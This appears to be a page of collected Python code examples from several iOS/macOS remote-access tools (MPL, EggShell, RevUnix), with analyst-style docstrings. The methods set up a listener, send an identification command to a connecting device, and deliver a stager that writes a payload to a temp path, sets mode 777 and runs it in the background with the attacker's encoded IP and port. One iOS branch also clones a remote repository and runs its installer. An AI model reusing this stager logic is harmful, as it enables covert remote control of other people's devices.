Exemplo n.º 1
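 def set_host_port(self):
     """Prompt the operator for the listener host and port and store them.

     The host defaults to the value returned by ``h.getip()`` and the port
     to 4444 when the operator just presses Enter. The port prompt repeats
     until the value is an integer in the range 1024-65535.

     On success ``self.host`` holds the result of
     ``socket.gethostbyname()`` for the chosen host and ``self.port`` the
     chosen port.

     Returns:
         True once both attributes are set, or None when the prompt is
         interrupted with Ctrl-C.

     Raises:
         socket.gaierror: propagated from ``socket.gethostbyname()`` when
             the entered host cannot be resolved; it is not caught here.
     """
     try:
         lhost = h.getip()
         choice = raw_input(h.info_general_raw("Local Host: "))
         if choice != "":
             lhost = choice
         while True:
             lport = raw_input(h.info_general_raw("Local Port: "))
             if not lport:
                 lport = 4444
             try:
                 lport = int(lport)
             except ValueError:
                 h.info_error("Invalid port, please enter a valid integer.")
                 continue
             if lport < 1024:
                 h.info_error("Invalid port, please enter a value >= 1024.")
                 continue
             if lport > 65535:
                 # 65535 is the largest valid TCP port; without this check
                 # an oversized value is accepted here and only fails later
                 # when the socket is bound.
                 h.info_error("Invalid port, please enter a value <= 65535.")
                 continue
             break
         h.info_general("Using " + lhost + ":" + str(lport) + "...")
         self.host = socket.gethostbyname(lhost)
         self.port = lport
         return True
     except KeyboardInterrupt:
         # Ctrl-C at either prompt abandons configuration without touching
         # self.host / self.port.
         return None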
Exemplo n.º 2
 def disconnect(self, verbose):
     """Close this session's connection and unregister it.

     Args:
         verbose: when truthy, print a status line and pause for half a
             second after the connection has been closed.

     The session is removed from the multihandler's ``sessions_id`` and
     ``sessions_uid`` mappings only while the multihandler reports
     ``is_running``. A missing key raises ``KeyError``.
     """
     self.conn.close()
     if verbose:
         h.info_general("Closing session...")
         time.sleep(0.5)
     multihandler = self.server.multihandler
     if not multihandler.is_running:
         return
     # Both indexes must drop the session, otherwise a closed connection
     # stays reachable through one of the lookups.
     del multihandler.sessions_id[self.id]
     del multihandler.sessions_uid[self.uid]
Exemplo n.º 3
 def craft_payload(self, device_arch):
     """Select the payload file and shell command text for a reported platform.

     Args:
         device_arch: the platform string the connecting peer reported. It
             is compared against ``self.macos_architectures`` and
             ``self.ios_architectures``; anything else falls through to the
             Python payload.

     Returns:
         A tuple ``(instructions, payload)``: ``instructions`` is a single
         newline-terminated shell command line, ``payload`` is the raw
         content of the file read from ``resources/``.

     Raises:
         ValueError: if ``self.host`` or ``self.port`` is falsy, or if
             ``device_arch`` contains an HTTP request line, meaning a web
             client connected to the listener.

     Analyst notes (all taken from the literals below): the command text
     stages a file in a temp directory, marks it mode 777, and runs it in
     the background with one encoded argument. These paths and the
     ``chmod 777`` plus background-exec sequence are the host artefacts
     this code leaves behind.
     """
     # TODO: Detect uid before we send executable
     if not self.host:
         raise ValueError('Server host not set')
     if not self.port:
         raise ValueError('Server port not set')
     # The listener address, port and debug flag travel as one JSON object
     # on the launched process's command line.
     # h.b64 is presumably a Base64 encoder (verify in the helper module);
     # if so, the argument is reversible by anyone who can read process
     # arguments on the host.
     payload_parameter = h.b64(
         json.dumps({
             "ip": self.host,
             "port": self.port,
             "debug": self.debug
         }))
     if device_arch in self.macos_architectures:
         self.verbose_print("Detected macOS")
         # NOTE(review): opened without a context manager, so the handle
         # is not closed if read() raises. The path is relative to the
         # current working directory.
         f = open("resources/mplmacos", "rb")
         payload = f.read()
         f.close()
         # Command text: stdin -> /private/tmp/tmpmpl, chmod 777, rename to
         # /private/tmp/mpl, run in the background with stderr discarded.
         instructions = \
         "cat >/private/tmp/tmpmpl;"+\
         "chmod 777 /private/tmp/tmpmpl;"+\
         "mv /private/tmp/tmpmpl /private/tmp/mpl;"+\
         "/private/tmp/mpl "+payload_parameter+" 2>/dev/null &\n"
         return (instructions, payload)
     elif device_arch in self.ios_architectures:
         self.verbose_print("Detected iOS")
         f = open("resources/mplios", "rb")
         payload = f.read()
         f.close()
         # Command text: stdin -> /tmp/tmpmpl, chmod 777, rename to /.mpl
         # (a dot-file in the filesystem root). It then removes any
         # existing "mouse" directory, clones the repository named in the
         # literal, runs its install.sh and restarts SpringBoard before
         # launching /.mpl.
         # NOTE(review): the clone is unpinned (no commit or tag), so what
         # install.sh executes is whatever that repository serves at the
         # time.
         instructions = \
         "cat >/tmp/tmpmpl;"+\
         "chmod 777 /tmp/tmpmpl;"+\
         "mv /tmp/tmpmpl /.mpl;"+\
         "rm -r mouse;"+\
         "git clone https://github.com/entynetproject/mouse.git;"+\
         "cd mouse/substrate && chmod +x install.sh && ./install.sh --ignore-package && killall SpringBoard;"+\
         "/.mpl "+payload_parameter+" 2>/dev/null &\n"
         return (instructions, payload)
     else:
         if device_arch == "Linux":
             self.verbose_print("Detected Linux")
         # An HTTP request line here means a browser (or scanner) hit the
         # listener port rather than the expected client.
         elif "GET / HTTP/1.1" in device_arch:
             raise ValueError(
                 "MPL does not exploit safari, it is a payload loader.")
         else:
             h.info_general("Device unrecognized, trying python payload...")
         f = open("resources/mpl.py", "rb")
         payload = f.read()
         f.close()
         # Command text: stdin -> /tmp/mpl.py, then run it with "python" in
         # the background.
         # NOTE(review): the chmod names /var/tmp/mpl.py, not the
         # /tmp/mpl.py file that was just written.
         instructions = \
         "cat >/tmp/mpl.py;"+\
         "chmod 777 /var/tmp/mpl.py;"+\
         "python /tmp/mpl.py "+payload_parameter+" &\n"
         return (instructions, payload)
Exemplo n.º 4
 def craft_payload(self, device_arch):
     """Select the payload file and shell command text for a reported platform.

     Args:
         device_arch: the platform string the connecting peer reported,
             matched against ``self.macos_architectures`` and
             ``self.ios_architectures``; any other value selects the Python
             payload.

     Returns:
         A tuple ``(instructions, payload)``: a newline-terminated shell
         command line and the raw content of the selected ``resources/``
         file.

     Raises:
         ValueError: if ``self.host`` or ``self.port`` is falsy, or if
             ``device_arch`` contains an HTTP request line.

     Analyst notes (from the literals below): each branch writes a file
     into a temp directory, sets mode 777 and executes it in the
     background with one encoded argument. These file paths are the
     on-host artefacts.
     """
     # TODO: Detect uid before we send executable
     if not self.host:
         raise ValueError('Server host not set')
     if not self.port:
         raise ValueError('Server port not set')
     # Listener ip/port/debug are serialised to JSON and passed through
     # h.b64 (presumably Base64; confirm in the helper module). The result
     # is visible in the launched process's argument list.
     payload_parameter = h.b64(
         json.dumps({
             "ip": self.host,
             "port": self.port,
             "debug": self.debug
         }))
     if device_arch in self.macos_architectures:
         self.verbose_print("Detected macOS")
         # NOTE(review): no context manager, so the handle leaks if read()
         # raises. The path is resolved against the current working
         # directory.
         f = open("resources/esplmacos", "rb")
         payload = f.read()
         f.close()
         # Command text: stdin -> /private/tmp/tmpespl, chmod 777, rename
         # to /private/tmp/espl, run in the background with stderr
         # discarded.
         instructions = \
         "cat >/private/tmp/tmpespl;"+\
         "chmod 777 /private/tmp/tmpespl;"+\
         "mv /private/tmp/tmpespl /private/tmp/espl;"+\
         "/private/tmp/espl "+payload_parameter+" 2>/dev/null &\n"
         return (instructions, payload)
     elif device_arch in self.ios_architectures:
         self.verbose_print("Detected iOS")
         f = open("resources/esplios", "rb")
         payload = f.read()
         f.close()
         # Command text: stdin -> /tmp/tmpespl, chmod 777, rename to /.espl
         # (a dot-file in the filesystem root), then run it in the
         # background.
         instructions = \
         "cat >/tmp/tmpespl;"+\
         "chmod 777 /tmp/tmpespl;"+\
         "mv /tmp/tmpespl /.espl;"+\
         "/.espl "+payload_parameter+" 2>/dev/null &\n"
         return (instructions, payload)
     else:
         if device_arch == "Linux":
             self.verbose_print("Detected Linux")
         # An HTTP request line means a web client reached the listener
         # port instead of the expected peer.
         elif "GET / HTTP/1.1" in device_arch:
             raise ValueError(
                 "EggShell does not exploit safari, it is a payload creation tool.\nPlease look at the README.md file"
             )
         else:
             h.info_general("Device unrecognized, trying python payload")
         f = open("resources/espl.py", "rb")
         payload = f.read()
         f.close()
         # Command text: stdin -> /tmp/espl.py, then run it with "python"
         # in the background.
         # NOTE(review): the chmod names /var/tmp/espl.py, which is not the
         # file written on the previous step.
         instructions = \
         "cat >/tmp/espl.py;"+\
         "chmod 777 /var/tmp/espl.py;"+\
         "python /tmp/espl.py "+payload_parameter+" &\n"
         return (instructions, payload)
Exemplo n.º 5
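 def set_host_port(self):
     """Prompt the operator for LHOST and LPORT and store them.

     LHOST defaults to the value returned by ``h.getip()`` and LPORT to
     4444 when the operator leaves the prompt blank. The port prompt
     repeats until the value is an integer in the range 1024-65535.

     On success ``self.host`` holds the result of
     ``socket.gethostbyname()`` for the chosen host and ``self.port`` the
     chosen port.

     Returns:
         True once both attributes are set, or None when the prompt is
         interrupted with Ctrl-C.

     Raises:
         socket.gaierror: propagated from ``socket.gethostbyname()`` when
             the entered host cannot be resolved; it is not caught here.
     """
     try:
         lhost = h.getip()
         choice = raw_input(
             h.info_general_raw("SET LHOST (Leave blank for " + lhost +
                                ")>"))
         if choice != "":
             lhost = choice
         h.info_general("LHOST = " + lhost)
         while True:
             lport = raw_input(
                 h.info_general_raw("SET LPORT (Leave blank for 4444)>"))
             if not lport:
                 lport = 4444
             try:
                 lport = int(lport)
             except ValueError:
                 h.info_general(
                     "invalid port, please enter a valid integer")
                 continue
             if lport < 1024:
                 h.info_general(
                     "invalid port, please enter a value >= 1024")
                 continue
             if lport > 65535:
                 # 65535 is the largest valid TCP port; without this check
                 # an oversized value is accepted here and only fails later
                 # when the socket is bound.
                 h.info_general(
                     "invalid port, please enter a value <= 65535")
                 continue
             break
         h.info_general("LPORT = " + str(lport))
         self.host = socket.gethostbyname(lhost)
         self.port = lport
         return True
     except KeyboardInterrupt:
         # Ctrl-C at either prompt abandons configuration without touching
         # self.host / self.port.
         return None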
Exemplo n.º 6
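 def set_host_port(self):
     """Prompt the operator for the listening host and port and store them.

     The host defaults to the value returned by ``h.getip()`` and the port
     to 1337 when the operator leaves the prompt blank. The port prompt
     repeats until the value is an integer in the range 1024-65535.

     On success ``self.host`` holds the result of
     ``socket.gethostbyname()`` for the chosen host and ``self.port`` the
     chosen port.

     Returns:
         True once both attributes are set, or None when the prompt is
         interrupted with Ctrl-C.

     Raises:
         socket.gaierror: propagated from ``socket.gethostbyname()`` when
             the entered host cannot be resolved; it is not caught here.
     """
     try:
         lhost = h.getip()
         choice = raw_input(
             h.info_general_raw("Set Listening Host (Leave blank for " +
                                lhost + ")>"))
         if choice != "":
             lhost = choice
         h.info_general("LHOST = " + lhost)
         while True:
             lport = raw_input(
                 h.info_general_raw(
                     "Set Listening Port (Leave blank for 1337)>"))
             if not lport:
                 lport = 1337
             try:
                 lport = int(lport)
             except ValueError:
                 h.info_general(
                     "Invalid Port. Please Enter A Valid Integer Value.")
                 continue
             if lport < 1024:
                 h.info_general(
                     "Invalid Port. Please Enter A Port With Value >= 1024")
                 continue
             if lport > 65535:
                 # 65535 is the largest valid TCP port; without this check
                 # an oversized value is accepted here and only fails later
                 # when the socket is bound.
                 h.info_general(
                     "Invalid Port. Please Enter A Port With Value <= 65535")
                 continue
             break
         h.info_general("LPORT = " + str(lport))
         self.host = socket.gethostbyname(lhost)
         self.port = lport
         return True
     except KeyboardInterrupt:
         # Ctrl-C at either prompt abandons configuration without touching
         # self.host / self.port.
         return None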
Exemplo n.º 7
    def craft_payload(self, device_arch):
        """Select the payload file and shell command text for a reported platform.

        Args:
            device_arch: the platform string the connecting peer reported,
                matched against ``self.macos_architectures`` and
                ``self.ios_architectures``; any other value selects the
                Python payload.

        Returns:
            A tuple ``(instructions, payload)``: a newline-terminated shell
            command line and the raw content of the selected ``resources/``
            file.

        Raises:
            ValueError: if ``self.host`` or ``self.port`` is falsy, or if
                ``self.is_multi`` equals False and ``device_arch`` contains
                an HTTP request line.

        Analyst notes (from the literals below): each branch writes a file
        into a temp directory, sets mode 777 and executes it in the
        background with one encoded argument. These file paths are the
        on-host artefacts.
        """

        if not self.host:
            raise ValueError(
                'Server Host IP Not Set. Please Set A Valid Host IP.')
        if not self.port:
            raise ValueError(
                'Server Port Number Not Set. Please Set A Valid Port Number.')
        # Listener ip/port are serialised to JSON with "debug" fixed at 1
        # and passed through h.b64 (presumably Base64; confirm in the
        # helper module). The result is visible in the launched process's
        # argument list.
        payload_parameter = h.b64(
            json.dumps({
                "ip": self.host,
                "port": self.port,
                "debug": 1
            }))
        if device_arch in self.macos_architectures:
            # Status lines are printed only when is_multi equals False.
            if self.is_multi == False:
                h.info_general("Detected MacOS!")
            # NOTE(review): no context manager, so the handle leaks if
            # read() raises. The path is resolved against the current
            # working directory.
            f = open("resources/ruplmacos", "rb")
            payload = f.read()
            f.close()

            # Command text: stdin -> /private/tmp/tmprupl, chmod 777,
            # rename to /private/tmp/rupl, run in the background with
            # stderr discarded.
            instructions = \
            "cat >/private/tmp/tmprupl;"+\
            "chmod 777 /private/tmp/tmprupl;"+\
            "mv /private/tmp/tmprupl /private/tmp/rupl;"+\
            "/private/tmp/rupl "+payload_parameter+" 2>/dev/null &\n"
            return (instructions, payload)
        elif device_arch in self.ios_architectures:
            if self.is_multi == False:
                h.info_general("Detected iOS!")
            f = open("resources/ruplios", "rb")
            payload = f.read()
            f.close()
            # Command text: stdin -> /tmp/tmprupl, chmod 777, rename to
            # /tmp/rupl, run in the background with stderr discarded.
            instructions = \
            "cat >/tmp/tmprupl;"+\
            "chmod 777 /tmp/tmprupl;"+\
            "mv /tmp/tmprupl /tmp/rupl;"+\
            "/tmp/rupl "+payload_parameter+" 2>/dev/null &\n"
            return (instructions, payload)
        else:
            # NOTE(review): the HTTP-request check below runs only when
            # is_multi equals False; otherwise an HTTP client reaching the
            # listener falls through to the Python payload branch.
            if self.is_multi == False:
                if device_arch == "Linux":
                    h.info_general("Detected Linux")
                elif "GET / HTTP/1.1" in device_arch:
                    raise ValueError(
                        "RevUnix does not exploit Safari Browser. RevUnix is a payload creation tool.\n Please look at the README.md file"
                    )
                else:
                    h.info_general(
                        "Device Unrecognized... \nTrying Python Payload...")
            f = open("resources/rupl.py", "rb")
            payload = f.read()
            f.close()
            # Command text: stdin -> /tmp/rupl.py, then run it with
            # "python" in the background.
            # NOTE(review): the chmod names /var/tmp/rupl.py, which is not
            # the file written on the previous step.
            instructions = \
            "cat >/tmp/rupl.py;"+\
            "chmod 777 /var/tmp/rupl.py;"+\
            "python /tmp/rupl.py "+payload_parameter+" &\n"
            return (instructions, payload)
Exemplo n.º 8
    def listen_for_stager(self):
        """Accept one inbound connection, identify the peer and send it a payload.

        Flow, as written below: bind a TCP listener on ``self.port``,
        accept a single connection, send a platform-identification shell
        command, read the reply, obtain ``(stager, executable)`` from
        ``self.craft_payload`` and send both, close that connection, then
        hand the listening socket to ``self.listen_for_executable_payload``.

        Returns:
            Whatever ``self.listen_for_executable_payload`` returns, or
            None on interrupt, empty reply, or any caught error.

        Analyst notes: the first connection uses a plain socket (no TLS
        wrapper appears in this method), so the fixed identification
        command, the command text and the executable cross the network in
        cleartext, and the identification literal is a stable first-bytes
        pattern. Nothing in this method authenticates the connecting peer.
        """

        identification_shell_command = 'com=$(uname -p); if [ $com != "unknown" ]; then echo $com; else uname; fi\n'

        s = socket.socket()
        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        # Binds every local interface, not only the host chosen by the
        # operator.
        s.bind(('0.0.0.0', self.port))
        s.listen(1)
        if self.is_multi == False:
            h.info_general("Listening On Port --> " + str(self.port) + ".....")
        try:
            conn, addr = s.accept()
        except KeyboardInterrupt:
            s.close()
            return

        hostAddress = addr[0]
        if self.is_multi == False:
            h.info_general("Establishing Connection To " + hostAddress)
        conn.send(identification_shell_command)
        # At most 128 bytes of peer-controlled data; this value selects
        # the payload branch in craft_payload.
        device_arch = conn.recv(128).strip()
        if not device_arch:
            # NOTE(review): neither conn nor s is closed on this path.
            return

        try:
            bash_stager, executable = self.craft_payload(device_arch)
        except Exception as e:
            h.info_error(str(e))
            raw_input("Please Press Enter To Continue Further!")
            # NOTE(review): neither conn nor s is closed on this path
            # either.
            return

        if self.is_multi == False:
            h.info_general("Sending Payload...")
        # NOTE(review): send() may transmit fewer bytes than given and its
        # return value is ignored here.
        conn.send(bash_stager)
        conn.send(executable)
        conn.close()
        if self.is_multi == False:
            h.info_general("Establishing Secure Connection...")
        # The ssl.SSLError handler suggests the second stage is
        # TLS-wrapped inside listen_for_executable_payload; confirm in
        # that method.
        try:
            return self.listen_for_executable_payload(s)
        except ssl.SSLError as e:
            h.info_error("SSL error: " + str(e))
            return
        except Exception as e:
            h.info_error("Error: " + str(e))
            return
Exemplo n.º 9
 def verbose_print(self, text):
     """Print *text* through ``h.info_general`` unless multi mode is on.

     The message is emitted only when ``self.is_multi`` compares equal to
     ``False``; any other value (including ``None``) suppresses it.
     """
     single_session = self.is_multi == False
     if not single_session:
         return
     h.info_general(text)